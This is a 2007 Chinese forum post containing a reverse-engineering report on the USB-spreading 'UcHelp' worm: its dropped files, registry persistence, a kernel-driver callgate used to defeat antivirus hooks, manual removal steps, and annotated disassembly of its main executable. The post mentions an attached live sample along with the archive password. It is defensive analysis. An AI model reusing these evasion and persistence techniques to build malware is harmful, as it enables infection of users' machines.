UcHelp 病毒分析

cater · 发表于 2007-12-1 13:33:59

记得申请PYG的时候，PYG刚刚成长，我事和他一起成长的
不过很少发帖。这篇是我今年六一写的病毒分析，尽管已经事过去时了
不过。。。。
也算自己的一份原创吧

本压缩包中包含病毒样本，注意！
解压密码：24882688

UcHelp 病毒分析 By Cater

Cater [*.S.T] QQ：24882688

2007.06.01 扬州/南京写
感谢恶灵骑士（MJ0011）以及 xyzreg

UcHelp 病毒分析
目录
第一章相关信息
1.1 简述计算机病毒概况 ………………………………………………… 2
1.2 读者应具备知识 …………………………………………………… 3
第二章介绍UcHelp病毒
2.1 病毒呈现的现象 …………………………………………………… 4
2.2 病毒运作机理 …………………………………………………… 5
2.3 病毒模块介绍 …………………………………………………… 6
2.4 病毒手动清除方案 …………………………………………………… 7
第三章 UcHelp病毒汇编分析
3.1 UcHelp.exe 的分析 …………………………………………… 8
3.2 sysret.dat的分析 ………………………………………………… 34
3.3 AceExt32.dll的分析 …………………………………………… 37
3.4 ulinshi32.exe的分析 ………………………………………… 38
3.5 ZipExt32.dll的分析 …………………………………………… 43
第四章附录
4.1 UcHelp病毒清除脚本 …………………………………………… 44
4.2 病毒预防措施……………………………………………………… 46
4.3 参考资料…………………………………………………………… 46
第一章相关信息
本病毒分析报告于计算机安全方面的读物，阅读本分析报告首先要对计算机病毒发展以及编程有一定的基础。
1.1 简述计算机病毒概况
什么是计算机病毒？
计算机病毒是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据,影响计算机使用，并能自我复制的一组计算机指令或者程序代码，就像生物病毒一样，计算机病毒有独特的复制能力。计算机病毒可以很快地蔓延，又常常难以根除。它们能把自身附着在各种类型的文件上。当文件被复制或从一个用户传送到另一个用户时，它们就随同文件一起蔓延开来。
制作病毒的目的
病毒程序的编写与反病毒本来就是一家，所谓的病毒程序起初是一些程序员为了测试某种功能而设计出的一种特殊程序，有的作者为了提高自己的名声在网上传播但绝大数都是为了经济目的。
目前的互联网非常脆弱，各种基础网络应用、电脑系统漏洞、Web程序的漏洞层出不穷，这些都为黑客和病毒制造者提供了入侵和偷窃的机会。与此同时，病毒产业链越来越完善，从病毒程序开发、传播病毒到销售病毒，形成了分工明确的整条操作流程，这条黑色产业链每年的整体利润预计高达数亿元。黑客和电脑病毒窃取的个人资料从QQ密码、网游密码到银行账号、信用卡账号等等，包罗万象，任何可以直接或间接转换成金钱的东西，都成为黑客窃取的对象。
目前流行病毒的传播
流行病毒的传播主要有网络与移动存储为主。
网络传播的手法主要有：
利用系统漏洞通过局域网或网页木马，病毒邮件将病毒传播到宿主机器上。
例如：
Arp病毒
利用MS07-04,MS07-16,MS07-17漏洞制作的网页木马传播的“网页收割者病毒”
移动存储的手法主要是：
利用AutoRun.ini 把移动硬盘或优盘里面的病毒激活。这一类病毒程序往往在学校机房，局域网中传播，一旦传播容易造成大规模移动存储体携带病毒，并感染使用这些携带病毒程序的主机。
例如：
前一段时间热门的熊猫烧香，威金等等
1.2 读者应具备知识
本病毒分析是针对具有一些编程经验和一定调试软件基础的程序员而写的。作为软件开发人员，有必要对软件编程调试与逆向分析两方面同时进行研究。也就是说应该更多地从逆向软件的角度考虑，这样才可能比较合理地运用各种技术。从别人写做的软件中获得作者开发软件的流程以及编程思想。
由于要与Windows的底层打交道，不可避免地要使用汇编语言，而且使用汇编语言来阐述将是最清晰直接和易于理解的，因此需要读者有一定的汇编基础。
本病毒分析适合以下读者：
对软件加密技术感兴趣的软件开发人员
进行商业软件开发的相关人员
对系统底层机制感兴趣的读者
对逆向工程感兴趣的读者
对病毒逆向分析人士
第二章介绍UcHelp病毒
UcHelp 是一款在移动存储体上感染并传播的病毒，他最早是我在学校机房中发现，到 2007年06月01日为止，瑞星最新版本，卡巴斯基最新版本等等杀毒软件还没有对该病毒程序做出“通缉令”。
2.1 病毒呈现的现象
生成文件:
* C:\tmp.hiv
* C:\sysret.dat
* C:\sysret.sys
* C:\WINDOWS \Downloaded Program Files\Ext32.dat
C:\WINDOWS\Downloaded Program Files\CxUSBKey.exe 49152
C:\WINDOWS\Downloaded Program Files\ZipExt32.dll 8192
C:\WINDOWS\system32\AceExt32.dll 16384
X:\RECYCLER\UcHelp.exe
X:\RECYCLER\desktop.ini
X:\autorun.inf
备注：打“*”的为临时产生的文件，病毒在正常情况下会将其删除。
修改注册表:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
AceExt={35CEC8A3-2BE6-11D2-8773-92E220524150}
ZipExt32={35CEC8A3-2BE6-11D2-8773-92E220524140}
HKEY_CLASSES_ROOT\CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524140}
HKEY_CLASSES_ROOT\CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524150}
注入到进程：
Explorer 中自动加载
system32\AceExt32.dll
windows\Downloaded Program Files\ZipExt32.dll
病毒行为：
病毒会感染所有移动存储设备，并加载到系统自动运行，继续传播感染其他及其和移动存储设备。
2.2 病毒运作机理
1．UcHelp.exe 检查是否有 avp.exe 进程
有就释放资源 ret 到 C:\sysret.dat 并运行
C:\sysret.dat释放资源 SYSRET 到 C:\sysret.sys，并加载驱动，向GDT添加一个callgate,以便R3的程序可以调用这个callgate来干一些只有R0才能干的事例如恢复杀毒软件或HIPS软件的SSDT HOOK，以及通过RestoreKey方式来过部分主动防御软件及杀毒软件的注册表监控写启动项。
2．释放资源dll到 system32\AceExt32.dll 并载到explorer进程
3．检查注册表
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SM_GameDro
是否为 yes
不是，就创建这样的键值
4.列举驱动器，找到移动设备
5.将本程序拷贝至 C:\windows\Downloaded Program Files\CxUSBKey.exe
6.如果上面 3，检查
不成立就从释放资源 exe 到 ulinshi32.exe 并运行
并建立 CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524150}与 AceExt32.dll 关联
注意：
UcHelp.exe为病毒程序的主程序，
它的资源中包含以下（2.3 病毒模块介绍）介绍的模块
2.3 病毒模块介绍
UcHelp.exe 模块
病毒程序的主程序，它的资源中包含以下模块。
sysret.dat模块
1. 释放资源 SYSRET 到 C:\sysret.sys，并加载到系统核心
2. Ring0级代码，禁止 avp.exe
3. 向GDT添加一个callgate,以便R3的程序可以调用这个callgate来获取R0权限，例如恢复杀毒软件或HIPS软件的SSDT HOOK
AceExr32.dll 模块
1. 修改注册表
SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
把 AceExt32.dll 加载到 Explorer.exe 进行中
ZipExt32.dll 也同上被加载到Explorer.exe 进行中
2. 修改注册表
写入{35CEC8A3-2BE6-11D2-8773-92E220524150}到 CLSD 关联 AceExt32.dll
3. AceExt32.dll 这个dll Hook了系统函数，还具有隐藏文件名为“autorun.inf”的文件并限制对该文件的读取和修改
4. 调用UnHelp.exe运行
ulinshi32.exe 模块
1. 修改注册表
CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524140}到CLSD关联 Zipext32.dll
2. 修改注册表
SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
这里把 Zipext32.dll 加载到 Explorer.exe 进行中
3. tmp.hiv,是用于用RestoreKey方式来过部分主动防御软件及杀毒软件的注册表监控写启动项
3. 还是有检查 avp.exe 进程，发现了又要利用sysret.sys 驱动功能了。
ZipExt32.dll模块
相当于木马模块，后门程序.
2.4 病毒手动清除方案
清除病毒一般的方法是，关闭病毒进程，修复病毒关联，清除病毒程序，修复感染文件，下面我们就对 UcHelp 病毒进行手动清除病毒。
首先让系统进入安全模式或者结束进程CxUSBKey.exe,explorer.exe
1. 如果有以下文件请删除
* C:\tmp.hiv
* C:\sysret.dat
* C:\sysret.sys
* C:\WINDOWS \Downloaded Program Files\Ext32.dat
C:\WINDOWS\Downloaded Program Files\Ext32.dll
C:\WINDOWS\Downloaded Program Files\CxUSBKey.exe 49152
C:\WINDOWS\Downloaded Program Files\ZipExt32.dll 8192
C:\WINDOWS\system32\AceExt32.dll 16384
X:\RECYCLER\UcHelp.exe
X:\RECYCLER\desktop.ini
X:\autorun.inf
备注：打“*”的为临时产生的文件，病毒在正常情况下会将其删除。
2. 删除注册表
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad下面的
AceExt={35CEC8A3-2BE6-11D2-8773-92E220524150}
ZipExt32={35CEC8A3-2BE6-11D2-8773-92E220524140}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SM_GameDro
HKEY_CLASSES_ROOT\CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524150}
HKEY_CLASSES_ROOT\CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524140}
3. 关闭自动运行
开始-》运行-》Gpedit.msc-》计算机配置-》管理模块-》系统-》关闭自动播放-》已启动-》所有驱动器-》确定 OK~
4. 插入移动存储器，鼠标右键打开
删除里面的病毒程序
X:\RECYCLER\UcHelp.exe
X:\RECYCLER\desktop.ini
X:\autorun.inf
到这里病毒已经算是被清除掉了。
第三章 UcHelp病毒汇编分析
【病毒调试环境】
【病毒加壳方式】: FSG 2.0
【病毒编写语言】: C++ 6.0
【调试病毒工具】: OllyDbg1.10
【调试主机系统】: Windows XP-SP2
3.1 Help.exe 的分析
病毒程序 UcHelp.exe 的分析
00401800 /$ 55 PUSH EBP
00401801 |. 8BEC MOV EBP,ESP
00401803 |. 83E4 F8 AND ESP,FFFFFFF8
00401806 |. 81EC 94010000 SUB ESP,194
0040180C |. 33C0 XOR EAX,EAX
0040180E |. 894424 09 MOV DWORD PTR SS:[ESP+9],EAX
00401812 |. 53 PUSH EBX
00401813 |. 66:894424 11 MOV WORD PTR SS:[ESP+11],AX
00401818 |. 56 PUSH ESI
00401819 |. 57 PUSH EDI
0040181A |. 884424 20 MOV BYTE PTR SS:[ESP+20],AL
0040181E |. 884424 1B MOV BYTE PTR SS:[ESP+1B],AL
00401822 |. B9 1F000000 MOV ECX,1F
00401827 |. 8D7C24 21 LEA EDI,DWORD PTR SS:[ESP+21]
0040182B |. F3:AB REP STOS DWORD PTR ES:[EDI]
0040182D |. 68 80000000 PUSH 80 ; /BufSize = 80 (128.)
00401832 |. 8D4C24 24 LEA ECX,DWORD PTR SS:[ESP+24] ; |
00401836 |. 66:AB STOS WORD PTR ES:[EDI] ; |
00401838 |. 51 PUSH ECX ; |PathBuffer
00401839 |. 6A 00 PUSH 0 ; |hModule = NULL
0040183B |. C64424 20 00 MOV BYTE PTR SS:[ESP+20],0 ; |
00401840 |. AA STOS BYTE PTR ES:[EDI] ; |
00401841 |. FF15 7C204000 CALL DWORD PTR DS:[<&KERNEL32.GetModuleF>; \GetModuleFileNameA
00401847 |. E8 E4F8FFFF CALL UcHelp.00401130 ;检查进程是否含有 avp.exe
0040184C |. 84C0 TEST AL,AL
0040184E |. 74 2E JE SHORT UcHelp.0040187E
00401850 |. 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8] ;有 avp.exe来这里
00401853 |. 6A 05 PUSH 5 ; /ShowState = SW_SHOW
00401855 |. 6A 00 PUSH 0 ; |/lParam = 0
00401857 |. 68 E0174000 PUSH UcHelp.004017E0 ; ||pDlgProc = UcHelp.004017E0
0040185C |. 6A 00 PUSH 0 ; ||hOwner = NULL
0040185E |. 6A 65 PUSH 65 ; ||pTemplate = 65
00401860 |. 52 PUSH EDX ; ||hInst
00401861 |. FF15 E4204000 CALL DWORD PTR DS:[<&USER32.CreateDialog>; |\CreateDialogParamA
00401867 |. 50 PUSH EAX ; |hWnd
00401868 |. FF15 E8204000 CALL DWORD PTR DS:[<&USER32.ShowWindow>] ; \ShowWindow
0040186E |. E8 2DF9FFFF CALL UcHelp.004011A0 ;释放资源ret到C:\sysret.dat并运行
00401873 |. 68 58020000 PUSH 258 ; /Timeout = 600. ms
00401878 |. FF15 8C204000 CALL DWORD PTR DS:[<&KERNEL32.Sleep>] ; \Sleep
0040187E |> \E8 ADFBFFFF CALL UcHelp.00401430
;释放资源dll到 system32\AceExt32.dll 并载到explorer进程
00401883 |. 8B35 B4204000 MOV ESI,DWORD PTR DS:[<&MSVCRT.strs>; msvcrt.strstr
00401889 |. 8D4424 20 LEA EAX,DWORD PTR SS:[ESP+20]
0040188D |. 68 C0234000 PUSH UcHelp.004023C0 ; /UcHelp.exe
00401892 |. 50 PUSH EAX ; |s1
00401893 |. FFD6 CALL ESI ; \strstr
00401895 |. 83C4 08 ADD ESP,8
; 检查当前程序的文件名中是否含有 UcHelp.exe
00401898 |. 85C0 TEST EAX,EAX
0040189A |. 75 4B JNZ SHORT UcHelp.004018E7
0040189C |. 8D4C24 10 LEA ECX,DWORD PTR SS:[ESP+10] ;无UcHelp.exe执行以下
004018A0 |. 51 PUSH ECX ; /pHandle
004018A1 |. 68 3F000F00 PUSH 0F003F ; |Access = KEY_ALL_ACCESS
004018A6 |. 50 PUSH EAX ; |Reserved
004018A7 |. 68 78214000 PUSH UcHelp.00402178 ; |SOFTWARE\Microsoft\Windows\CurrentVersion
004018AC |. 68 02000080 PUSH 80000002 ; |hKey = HKEY_LOCAL_MACHINE
004018B1 |. FF15 08204000 CALL DWORD PTR DS:[<&ADVAPI32.RegOp>; \RegOpenKeyExA
004018B7 |. 68 68214000 PUSH UcHelp.00402168 ; /yes
004018BC |. FF15 3C204000 CALL DWORD PTR DS:[<&KERNEL32.lstrl>; \lstrlenA
004018C2 |. 8B5424 10 MOV EDX,DWORD PTR SS:[ESP+10]
004018C6 |. 50 PUSH EAX ; /BufSize
004018C7 |. 68 68214000 PUSH UcHelp.00402168 ; |yes
004018CC |. 6A 01 PUSH 1 ; |ValueType = REG_SZ
004018CE |. 6A 00 PUSH 0 ; |Reserved = 0
004018D0 |. 68 6C214000 PUSH UcHelp.0040216C ; |SM_GameDrop
004018D5 |. 52 PUSH EDX ; |hKey
004018D6 |. FF15 00204000 CALL DWORD PTR DS:[<&ADVAPI32.RegSe>; \RegSetValueExA
004018DC |. 8B4424 10 MOV EAX,DWORD PTR SS:[ESP+10]
;写注册表
;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SM_GameDrop=Yes
004018E0 |. 50 PUSH EAX ; /hKey
004018E1 |. FF15 18204000 CALL DWORD PTR DS:[<&ADVAPI32.RegCl>; \RegCloseKey
004018E7 |> 8D4C24 20 LEA ECX,DWORD PTR SS:[ESP+20]
004018EB |. 68 C0234000 PUSH UcHelp.004023C0 ; UcHelp.exe
004018F0 |. 51 PUSH ECX
004018F1 |. FFD6 CALL ESI
004018F3 |. 83C4 08 ADD ESP,8
004018F6 |. 85C0 TEST EAX,EAX
004018F8 |. 0F84 70010000 JE UcHelp.00401A6E
004018FE |. 8B35 EC204000 MOV ESI,DWORD PTR DS:[<&USER32.wspr>; USER32.wsprintfA
00401904 |. 8B3D 70204000 MOV EDI,DWORD PTR DS:[<&KERNEL32.Ge>; kernel32.GetDriveTypeA
0040190A |. B3 43 MOV BL,43
0040190C |. 8D6424 00 LEA ESP,DWORD PTR SS:[ESP]
00401910 |> 0FBEC3 /MOVSX EAX,BL
00401913 |. 50 |PUSH EAX
00401914 |. 33D2 |XOR EDX,EDX
00401916 |. 8D4C24 18 |LEA ECX,DWORD PTR SS:[ESP+18]
0040191A |. 895424 18 |MOV DWORD PTR SS:[ESP+18],EDX
0040191E |. 68 BC234000 |PUSH UcHelp.004023BC ; %c:
00401923 |. 51 |PUSH ECX
00401924 |. 895424 24 |MOV DWORD PTR SS:[ESP+24],EDX
00401928 |. FFD6 |CALL ESI
0040192A |. 83C4 0C |ADD ESP,0C
0040192D |. 8D5424 14 |LEA EDX,DWORD PTR SS:[ESP+14]
00401931 |. 52 |PUSH EDX
00401932 |. FFD7 |CALL EDI
00401934 |. 83F8 02 |CMP EAX,2
00401937 |. 74 09 |JE SHORT UcHelp.00401942 ; 找到移动设备跳出
00401939 |. FEC3 |INC BL ; 列举驱动器，从 c盘列举到 z 盘
0040193B |. 80FB 5A |CMP BL,5A
0040193E |.^ 7E D0 \JLE SHORT UcHelp.00401910
00401940 |. EB 7B JMP SHORT UcHelp.004019BD
00401942 |> 6A 00 PUSH 0 ; /Title = NULL
00401944 |. 68 AC234000 PUSH UcHelp.004023AC ; |CabinetWClass
00401949 |. FF15 F4204000 CALL DWORD PTR DS:[<&USER32.FindWin>; \FindWindowA
0040194F |. 8B35 FC204000 MOV ESI,DWORD PTR DS:[<&USER32.Find>; USER32.FindWindowExA
00401955 |. 6A 00 PUSH 0 ; /Title = NULL
00401957 |. 68 A4234000 PUSH UcHelp.004023A4 ; |WorkerW
0040195C |. 6A 00 PUSH 0 ; |hAfterWnd = NULL
0040195E |. 50 PUSH EAX ; |hParent
0040195F |. FFD6 CALL ESI ; \FindWindowExA
00401961 |. 6A 00 PUSH 0 ; /Title = NULL
00401963 |. 68 94234000 PUSH UcHelp.00402394 ; |ReBarWindow32
00401968 |. 6A 00 PUSH 0 ; |hAfterWnd = NULL
0040196A |. 50 PUSH EAX ; |hParent
0040196B |. FFD6 CALL ESI ; \FindWindowExA
0040196D |. 6A 00 PUSH 0 ; /Title = NULL
0040196F |. 68 84234000 PUSH UcHelp.00402384 ; |ComboBoxEx32
00401974 |. 6A 00 PUSH 0 ; |hAfterWnd = NULL
00401976 |. 50 PUSH EAX ; |hParent
00401977 |. FFD6 CALL ESI ; \FindWindowExA
00401979 |. 6A 00 PUSH 0 ; /Title = NULL
0040197B |. 68 78234000 PUSH UcHelp.00402378 ; |ComboBox
00401980 |. 6A 00 PUSH 0 ; |hAfterWnd = NULL
00401982 |. 50 PUSH EAX ; |hParent
00401983 |. FFD6 CALL ESI ; \FindWindowExA
00401985 |. 6A 00 PUSH 0 ; /Title = NULL
00401987 |. 68 70234000 PUSH UcHelp.00402370 ; |Edit
0040198C |. 6A 00 PUSH 0 ; |hAfterWnd = NULL
0040198E |. 50 PUSH EAX ; |hParent
0040198F |. FFD6 CALL ESI ; \FindWindowExA
00401991 |. 8B3D F0204000 MOV EDI,DWORD PTR DS:[<&USER32.Send>; USER32.SendMessageA
00401997 |. 8BF0 MOV ESI,EAX
00401999 |. 8D4424 14 LEA EAX,DWORD PTR SS:[ESP+14]
; 下面是激活该移动设备的资源管理器窗口
0040199D |. 50 PUSH EAX ; /lParam
0040199E |. 6A 00 PUSH 0 ; |wParam = 0
004019A0 |. 6A 0C PUSH 0C ; |Message = WM_SETTEXT
004019A2 |. 56 PUSH ESI ; |hWnd
004019A3 |. FFD7 CALL EDI ; \SendMessageA
004019A5 |. 6A 00 PUSH 0 ; /lParam = 0
004019A7 |. 6A 0D PUSH 0D ; |wParam = D
004019A9 |. 68 00010000 PUSH 100 ; |Message = WM_KEYDOWN
004019AE |. 56 PUSH ESI ; |hWnd
004019AF |. FFD7 CALL EDI ; \SendMessageA
004019B1 |. 6A 00 PUSH 0 ; /lParam = 0
004019B3 |. 6A 0D PUSH 0D ; |wParam = D
004019B5 |. 68 01010000 PUSH 101 ; |Message = WM_KEYUP
004019BA |. 56 PUSH ESI ; |hWnd
004019BB |. FFD7 CALL EDI ; \SendMessageA
004019BD |> C68424 A00000>MOV BYTE PTR SS:[ESP+A0],0
; 以上代码是向移动存储体中写入病毒程序
004019C5 |. 33C0 XOR EAX,EAX
004019C7 |. B9 3F000000 MOV ECX,3F
004019CC |. 8DBC24 A10000>LEA EDI,DWORD PTR SS:[ESP+A1]
004019D3 |. F3:AB REP STOS DWORD PTR ES:[EDI]
004019D5 |. 8D4C24 10 LEA ECX,DWORD PTR SS:[ESP+10]
004019D9 |. 51 PUSH ECX ; /pHandle
004019DA |. 66:AB STOS WORD PTR ES:[EDI] ; |
004019DC |. 68 30234000 PUSH UcHelp.00402330 ;
|Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
004019E1 |. 68 01000080 PUSH 80000001 ; |hKey = HKEY_CURRENT_USER
004019E6 |. AA STOS BYTE PTR ES:[EDI] ; |
004019E7 |. FF15 10204000 CALL DWORD PTR DS:[<&ADVAPI32.RegOp>; \RegOpenKeyA
004019ED |. 8B1D 14204000 MOV EBX,DWORD PTR DS:[<&ADVAPI32.Re>; ADVAPI32.RegEnumKeyA
004019F3 |. C74424 1C 0A0>MOV DWORD PTR SS:[ESP+1C],0A
004019FB |. EB 03 JMP SHORT UcHelp.00401A00
004019FD | 8D49 00 LEA ECX,DWORD PTR DS:[ECX]
00401A00 |> 8B4424 10 /MOV EAX,DWORD PTR SS:[ESP+10]
00401A04 |. 68 00010000 |PUSH 100
00401A09 |. 8D9424 A40000>|LEA EDX,DWORD PTR SS:[ESP+A4]
00401A10 |. 52 |PUSH EDX
00401A11 |. 33F6 |XOR ESI,ESI
00401A13 |. 56 |PUSH ESI
00401A14 |. 50 |PUSH EAX
00401A15 |. FFD3 |CALL EBX
00401A17 |. 85C0 |TEST EAX,EAX
00401A19 |. 75 42 |JNZ SHORT UcHelp.00401A5D
00401A1B |. EB 03 |JMP SHORT UcHelp.00401A20
00401A1D | 8D49 00 |LEA ECX,DWORD PTR DS:[ECX]
00401A20 |> 8B5424 10 |/MOV EDX,DWORD PTR SS:[ESP+10]
00401A24 |. 8D8C24 A00000>||LEA ECX,DWORD PTR SS:[ESP+A0]
00401A2B |. 51 ||PUSH ECX ; /SubKey
00401A2C |. 52 ||PUSH EDX ; |hKey
00401A2D |. FF15 DC204000 ||CALL DWORD PTR DS:[<&SHLWAPI.SHDe>; \SHDeleteKeyA
00401A33 |. 33C0 ||XOR EAX,EAX
00401A35 |. B9 40000000 ||MOV ECX,40
00401A3A |. 8DBC24 A00000>||LEA EDI,DWORD PTR SS:[ESP+A0]
00401A41 |. F3:AB ||REP STOS DWORD PTR ES:[EDI]
00401A43 |. 8B4C24 10 ||MOV ECX,DWORD PTR SS:[ESP+10]
00401A47 |. 68 00010000 ||PUSH 100
00401A4C |. 8D8424 A40000>||LEA EAX,DWORD PTR SS:[ESP+A4]
00401A53 |. 50 ||PUSH EAX
00401A54 |. 46 ||INC ESI
00401A55 |. 56 ||PUSH ESI
00401A56 |. 51 ||PUSH ECX
00401A57 |. FFD3 ||CALL EBX
00401A59 |. 85C0 ||TEST EAX,EAX
00401A5B |.^ 74 C3 |\JE SHORT UcHelp.00401A20
00401A5D |> FF4C24 1C |DEC DWORD PTR SS:[ESP+1C]
; 在那个项目里面依次删除无关项目
00401A61 |.^ 75 9D \JNZ SHORT UcHelp.00401A00
00401A63 |. E8 B8F7FFFF CALL UcHelp.00401220
; 检查 SM_GameDrop 键值是否为 yes，不是就从释放资源 exe 到 ulinshi32.exe 并运行
00401A68 |. 8B35 B4204000 MOV ESI,DWORD PTR DS:[<&MSVCRT.strs>; msvcrt.strstr
00401A6E |> E8 0DFCFFFF CALL UcHelp.00401680
; 建立 CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524150} 将 AceExt32.dll 与之关联以及建立项目情况
00401A73 |. E8 28F9FFFF CALL UcHelp.004013A0
; 将本程序拷贝至 C:\windows\Downloaded Program Files\CxUSBKey.exe
00401A78 |. 8D5424 20 LEA EDX,DWORD PTR SS:[ESP+20]
00401A7C |. 68 C0234000 PUSH UcHelp.004023C0 ; UcHelp.exe
00401A81 |. 52 PUSH EDX
00401A82 |. FFD6 CALL ESI
00401A84 |. 83C4 08 ADD ESP,8
00401A87 |. 85C0 TEST EAX,EAX
00401A89 |. 75 05 JNZ SHORT UcHelp.00401A90
00401A8B |. E8 70F5FFFF CALL UcHelp.00401000
;在临时文件夹创建ziptmp.bat写入，删除本程序的批处理并且运行
00401A90 |> 5F POP EDI
00401A91 |. 5E POP ESI
00401A92 |. 33C0 XOR EAX,EAX
00401A94 |. 5B POP EBX
00401A95 |. 8BE5 MOV ESP,EBP
00401A97 |. 5D POP EBP
00401A98 \. C2 1000 RETN 10
=====================================================================
00401130 /$ 81EC 28010000 SUB ESP,128
00401136 |. 56 PUSH ESI
00401137 |. 57 PUSH EDI
00401138 |. 6A 00 PUSH 0 ; /ProcessID = 0
0040113A |. 6A 02 PUSH 2 ; |Flags = TH32CS_SNAPPROCESS
0040113C |. E8 67090000 CALL <JMP.&KERNEL32.CreateToolhelp32Snap>; \CreateToolhelp32Snapshot
00401141 |. 8BF8 MOV EDI,EAX
00401143 |. 8D4424 08 LEA EAX,DWORD PTR SS:[ESP+8]
00401147 |. 50 PUSH EAX ; /pProcessentry
00401148 |. 57 PUSH EDI ; |hSnapshot
00401149 |. C74424 10 280>MOV DWORD PTR SS:[ESP+10],128 ; |
00401151 |. E8 4C090000 CALL <JMP.&KERNEL32.Process32First> ; \Process32First
00401156 |. 85C0 TEST EAX,EAX
00401158 |. 74 28 JE SHORT UcHelp.00401182
0040115A |. 8B35 A0204000 MOV ESI,DWORD PTR DS:[<&MSVCRT._stricmp>>; msvcrt._stricmp
00401160 |> 8D4C24 2C /LEA ECX,DWORD PTR SS:[ESP+2C]
00401164 |. 68 4C214000 |PUSH UcHelp.0040214C ; avp.exe
00401169 |. 51 |PUSH ECX
0040116A |. FFD6 |CALL ESI
0040116C |. 83C4 08 |ADD ESP,8
0040116F |. 85C0 |TEST EAX,EAX
00401171 |. 74 1A |JE SHORT UcHelp.0040118D ;列举进程中是否含有 avp.exe 进程
00401173 |. 8D5424 08 |LEA EDX,DWORD PTR SS:[ESP+8]
00401177 |. 52 |PUSH EDX ; /pProcessentry
00401178 |. 57 |PUSH EDI ; |hSnapshot
00401179 |. E8 1E090000 |CALL <JMP.&KERNEL32.Process32Next> ; \Process32Next
0040117E |. 85C0 |TEST EAX,EAX
00401180 |.^ 75 DE \JNZ SHORT UcHelp.00401160
00401182 |> 5F POP EDI
00401183 |. 32C0 XOR AL,AL
00401185 |. 5E POP ESI
00401186 |. 81C4 28010000 ADD ESP,128
0040118C |. C3 RETN
0040118D |> 5F POP EDI ; 有就返回 1 没有返回0
0040118E |. B0 01 MOV AL,1
00401190 |. 5E POP ESI
00401191 |. 81C4 28010000 ADD ESP,128
00401197 \. C3 RETN
004011A0 /$ 51 PUSH ECX
004011A1 |. 53 PUSH EBX
004011A2 |. 56 PUSH ESI
004011A3 |. 57 PUSH EDI
004011A4 |. 68 64214000 PUSH UcHelp.00402164 ; /ret
004011A9 |. 6A 69 PUSH 69 ; |ResourceName = 69
004011AB |. 6A 00 PUSH 0 ; |hModule = NULL
004011AD |. FF15 38204000 CALL DWORD PTR DS:[<&KERNEL32.FindResour>; \FindResourceA
004011B3 |. 8BF0 MOV ESI,EAX
004011B5 |. 56 PUSH ESI ; /hResource
004011B6 |. 6A 00 PUSH 0 ; |hModule = NULL
004011B8 |. FF15 34204000 CALL DWORD PTR DS:[<&KERNEL32.SizeofReso>; \SizeofResource
004011BE |. 56 PUSH ESI ; /hResource
004011BF |. 6A 00 PUSH 0 ; |hModule = NULL
004011C1 |. 8BF8 MOV EDI,EAX ; |
004011C3 |. FF15 30204000 CALL DWORD PTR DS:[<&KERNEL32.LoadResour>; \LoadResource
004011C9 |. 6A 00 PUSH 0 ; /hTemplateFile = NULL
004011CB |. 6A 00 PUSH 0 ; |Attributes = 0
004011CD |. 6A 02 PUSH 2 ; |Mode = CREATE_ALWAYS
004011CF |. 6A 00 PUSH 0 ; |pSecurity = NULL
004011D1 |. 6A 00 PUSH 0 ; |ShareMode = 0
004011D3 |. 68 000000C0 PUSH C0000000;|Accesss= GENERIC_READ|GENERIC_WRITE
004011D8 |. 68 54214000 PUSH UcHelp.00402154 ; |C:\sysret.dat
004011DD |. 8BD8 MOV EBX,EAX ; |
004011DF |. FF15 80204000 CALL DWORD PTR DS:[<&KERNEL32.CreateFile>; \CreateFileA
004011E5 |. 6A 00 PUSH 0 ; /pOverlapped = NULL
004011E7 |. 8BF0 MOV ESI,EAX ; |
004011E9 |. 8D4424 10 LEA EAX,DWORD PTR SS:[ESP+10] ; |
004011ED |. 50 PUSH EAX ; |pBytesWritten
004011EE |. 57 PUSH EDI ; |nBytesToWrite
004011EF |. 53 PUSH EBX ; |/nHandles
004011F0 |. FF15 2C204000 CALL DWORD PTR DS:[<&KERNEL32.LockResour>; |\SetHandleCount
004011F6 |. 50 PUSH EAX ; |Buffer
004011F7 |. 56 PUSH ESI ; |hFile
004011F8 |. FF15 84204000 CALL DWORD PTR DS:[<&KERNEL32.WriteFile>>; \WriteFile
004011FE |. 56 PUSH ESI ; /hObject
004011FF |. FF15 88204000 CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle
00401205 |. 6A 05 PUSH 5 ; /ShowState = SW_SHOW
00401207 |. 68 54214000 PUSH UcHelp.00402154 ; |C:\sysret.dat
0040120C |. FF15 94204000 CALL DWORD PTR DS:[<&KERNEL32.WinExec>];\WinExec
00401212 |. 5F POP EDI ;释放资源里面的 ret
00401213 |. 5E POP ESI ;写入到 C:\sysret.dat,并运行
00401214 |. 33C0 XOR EAX,EAX
00401216 |. 5B POP EBX
00401217 |. 59 POP ECX
00401218 \. C3 RETN
=====================================================================
00401430 /$ 55 PUSH EBP
00401431 |. 8BEC MOV EBP,ESP
00401433 |. 83E4 F8 AND ESP,FFFFFFF8
00401436 |. 81EC A8030000 SUB ESP,3A8
0040143C |. 53 PUSH EBX
0040143D |. 55 PUSH EBP
0040143E |. 56 PUSH ESI
0040143F |. 57 PUSH EDI
00401440 |. 33C0 XOR EAX,EAX
00401442 |. C64424 38 00 MOV BYTE PTR SS:[ESP+38],0
00401447 |. B9 1F000000 MOV ECX,1F
0040144C |. 8D7C24 39 LEA EDI,DWORD PTR SS:[ESP+39]
00401450 |. F3:AB REP STOS DWORD PTR ES:[EDI]
00401452 |. 66:AB STOS WORD PTR ES:[EDI]
00401454 |. AA STOS BYTE PTR ES:[EDI]
